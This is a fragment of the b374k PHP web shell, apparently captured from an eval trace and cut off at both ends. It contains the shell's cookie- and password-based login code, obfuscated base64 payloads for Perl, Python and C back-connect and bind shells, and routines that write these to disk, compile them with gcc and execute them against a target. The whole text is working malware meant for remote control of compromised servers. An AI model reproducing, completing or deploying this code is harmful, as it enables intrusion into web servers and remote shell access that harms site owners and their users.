0){ if(isset($_COOKIE[\'b374k\'])){ if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE[\'b374k\']))) $s_auth = true; } if(isset($_REQUEST[\'login\'])){ $login = strtolower(trim($_REQUEST[\'login\'])); if(strtolower(trim($s_pass)) == md5($login)){ setcookie("b374k",md5($login),time() + 3600*24*7); $m = $_SERVER[\'PHP_SELF\']; header("Location: ".$m)'
4 19 0 0.011716 999640 eval 1 '?>0){ if(isset($_COOKIE[\'b374k\'])){ if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE[\'b374k\']))) $s_auth = true; } if(isset($_REQUEST[\'login\'])){ $login = strtolower(trim($_REQUEST[\'login\'])); if(strtolower(trim($s_pass)) == md5($login)){ setcookie("b374k",md5($login),time() + 3600*24*7); $m = $_SERVER[\'PHP_SELF\']; header("Location: ".$m); die(); } else{ setcookie("b374k",$login,time() - 3600*24*7); $m = $_SERVER[\'PHP_SELF\']; header("Location: ".$m); die(); } } } else $s_auth = true; $xback_pl ="dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0="; $xbind_pl ="bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1NWzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5Wikvo+hjUoV7Dvky3ZfgI="; $xback_c = "XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJWUnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B"; $xbind_c = "dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEOc7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0ORwe4uPZdVXswVu4D52f3OkJUu9BxLJJ/qXWfqcNbiuCHfJWrFvaGR2ys/Ak/MZqkgXlfw=="; $xmulti_py = "lVNda9swFH22wf9B9R4qk9T56PYS0CCMlJYlzWgyGHQjuLZSizqSkZS2+ffVvbKb0GSM5SHWx9E5514dfTrrbY3uPQjZ4/KZ1DtbKhmFYlMrbYkyXWJ28KfyJ267xIoNj8LZ+NdqOrllg/7wcxQurifTKYuR4yEzJbnI4yhc3swmq/nPJbvs96Pwx/xuyWK3fD1f+EHB18SUvKpovimSURQGplyprWXKpLWquaTI24lJ3AFEqnlWVEJyQxMHlg0aqIK10kQQIYnO5COnlTvstxMkbsEd5r/34o9b1dxutSTNnjeU5VYoSXMlJZ58KUXFyVJvOfJYvcNvUDtHDFDOVf5Mm36Ar4C/5ry2DUwLaWnMtVb6t4xxv9UFUsRXxpMHwInlBKcKAsnkYuALQnCHwZovxv3EmgADi0dFHjeoj2Igt8eZ4iPuKnNuWmDrC6nBAjj42m8XA2j//gbbVeyK4bKg0P8ozPTjM3MZSmHgguWpYJIwNgQyzAYs3A9cKWjwAHJ5DAkwRDgd4gnnlPBXYekgaaIGfYdBgoouUq6jTzQ5Y2gf7CC+7/Yh2sznO/Uf2szGV6ub28myTX+6mH/7vlos7ybjWXPOFWrhSbhSaRv45GSRiHYvpKD0vFJ5VpXK2PMuQZNJC6iEse4g2NJbyfy1+RC6OfCcaA7GEj2m0HyeW0qhQwfk/04lVJGaivOafknecwmqrHkUIAA778EA2QDfSjcrCp1gE9MsByX636qD06r4FI/qHo6Iz1m5tYV6kXR45Iw09+M6HseHbshfRD1+T/gG"; $wmulti_c = "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"; $favicon = "AQYD+fyJUE5HDQoaCgAAAA1JSERSAAAAEAAAABAIBgAAAB/z/2EAAAAEZ0FNQQAAr8g3BYrpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAphJREFUOMudk8lPU1EUxvkbXAMdXlug2Kp0eu8ViiUIC2wZJJYqkwUqFiqUMjqgAQppUnAIiBKmFoq0thYKBI0GBGMw0ejGxIVLdyYmYDQ0xPD5HokopmXh4kvuyb3nd853ck8cgLhYylymkblIadlzxmNVUXpAuf3vmwOB9pma+DvWhElkhFRhy4Cer/YpaugZ+bdDASfZiktU8+84PaiKqP3Kr+YbOd6CXnqbHpPtltjUzpgAzQK5mTFPRvZaDpBb9KwClFcOyi1H53oT1j+H0O6qgK4mrSUqgPGpTX+khMZHbuYFTiH4YRxPPk5j4KUDklvJqFjOh//1ME70H8VxZyqkDjFTdZ7cYnzue2d87mZ6Kcy+u42epyZcDZegNVwJzTAJiTMFpmkDsgtEn/Y7YHzuMD5BP1R4NF7yy9lgAbxv+3FzqRz2YD7KprJg9BfC92YEQ6sDkHanQG0Uhg5YoKblG6RbBnJchsD7QXQulqIpoEeZWwvDjB731xywzxrwYKUXkk4xxB2i7ymtQuuBGZCjsojRVwTXcysa/TqUTmSh2HMa91a7YZ0qRNVYLgNwQtwmQrJdsJvUSEBUz/8zQNVQ2o/aoAl3VtpQNpmNMxN5cC22w+LRwzSaC8e8DQ2TFiTZBEiuJ46wOYSZe20fQN9V9KW5JOhaakPxuA6uhQ5Y3DpUjuSgZ84G6roSostM1TqiOuY/kPUdWyOauRh7MYiuUD0uMqCeuUZcmWmBsI4PQS0PRA03wjdxmqMCWEmvitekHWI0uGth99RBahPvJQrNvGomUcurSNzkliaAcy6eiApglWoXuZOs/J+CS0xFMxf8Ks6rWAsXd9g2suJf4GzwyhPBPZ9A/BeAFccYv5NoiN+KdvcLtyxxEwhxgvoAAAAASUVORK5CYII="; $style = "tVbJbtswEL33KwgEBVrAMrS4biKfggL9gqLXghIpiwhFChQd2xHy7xUpyhwtdlIgFS+2PJzlvTczziQ5tyjD+dNeyYMg6V1onx0qpNBBw15oGkX1yX0vcMX4Of2FS1nh1W+qCBZ49agY5juUSy5VelcUxQ69orsKMzF2Hdlnh2pMCBP7NK5P6N74Dir5EmRSEaoChQk7NCmKQvPL4ssjI7pMozD8bAOVFHc2Laqw2jORhj5A91HTkw4wZ3uRclpocAFpcuWONymjFgAR2+jA0N8OjjR7YjrQCoumkKpKkZIaa/oliJJ18p3Q/VdX520TGBvhFoDqcPXvNj/uk8efrkRCc6mwZlKkQgpqLNfGEROFbAcYDQJpxyZqJGcEXTy4OrawPENO2J3IvnXedMbbCfzD+wbpjoOSsn2p03hjLj1TpVmOucO/YoTwPrM9PuMVWj8b2ibVWLiPvZtMcmLtreGHYcyp1h0aTY1zV2kvWCoOy4IdeEYGlK405K6szZWKofaC2maQtJfGhEHoP34wZ/c+Qpey/jBIljpws9CAm1HhaSktM7CmZGvOrdTezmzUD2sm6oN+6eRSK1nVuvtAnzHPJaHLbPUpw56OQSWZ1FpWsAuSB3PmE2/Wei6BdlmjPinYIK4hkphWoJjsoNtZvFEtD+bMlHERIuAGlhLbp0/nVHdXJ9lAmYbQzIyVq3NksDED8yqKQ+jLeOz7gDNBg1tTQct6HKT03ZQM3QQBF51SzLoZNdKs7m4aLakzujfHGja0yg7izFpEWFNzfHYF+/nue7ibDoo2B96x9o+7as7RwOVsZECo+qm7pG6nCIwxkIMFu2e0NpxPSDDSLWuzCpDGGb8iisj46LOGF0h7K4/cPt7J1lWze1spMEi5ssQvUbXYbMPFMm7hilfGatTJ38AwTkK308IJtLk5AAiLwWTebie4mMhXSxw4BvZ+bw+Qmb3G6LFgU0IAra5R34Pl4MsyBrf45ub0Gzxc6ZLBa95BSoX2ns3MuqirOmfy9B96I5ruU4uHF3sf2HKx8E/OW14nyj7e1dIfHNX8GZrfu45u7xTgt5BSmzE0lynwtr1MuV62SwqMwVLyvJeqXdwDu9dPfwE="; $sortable_js = "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"; function swd($p){ $ps = explode(DIRECTORY_SEPARATOR,$p); $pu = ""; for($i = 0 ; $i < sizeof($ps)-1 ; $i++){ $pz = ""; for($j = 0 ; $j <= $i ; $j++) $pz .= $ps[$j].DIRECTORY_SEPARATOR; $pu .= "".$ps[$i]." ".DIRECTORY_SEPARATOR." "; } return trim($pu); } function rp($t){ return trim(str_replace("error: permission denied. check current working directory permissions
"; $errgcc = "error: can not compile using gcc
"; if($type == "xbind_pl"){ $fname = "b374k_bind.pl"; $fpath = $d.$fname; if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe("perl ".$fpath." ".$target); } else $result = $errperm; } else $result = $errperm; } elseif($type == "xbind_py"){ $fname = "b374k_bind.py"; $fpath = $d.$fname; if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe("python ".$fpath." ".$target); } else $result = $errperm; } else $result = $errperm; } elseif($type == "xbind_bin"){ $fname = "b374k_bind"; $fpath = $d.$fname; if(!$s_win){ if(is_file($fpath)) unlink($fpath); if(is_file($fpath.".c")) unlink($fpath.".c"); if($file=fopen($fpath.".c","w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath.".c")){ $res = exe("gcc ".$fpath.".c -o ".$fpath); if(is_file($fpath)){ $res = exe("chmod +x ".$fpath); $res = exe($fpath." ".$target); } else $result = $errgcc; } else $result = $errperm; } else $result = $errperm; } else{ $fpath = $fpath . ".exe"; if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); 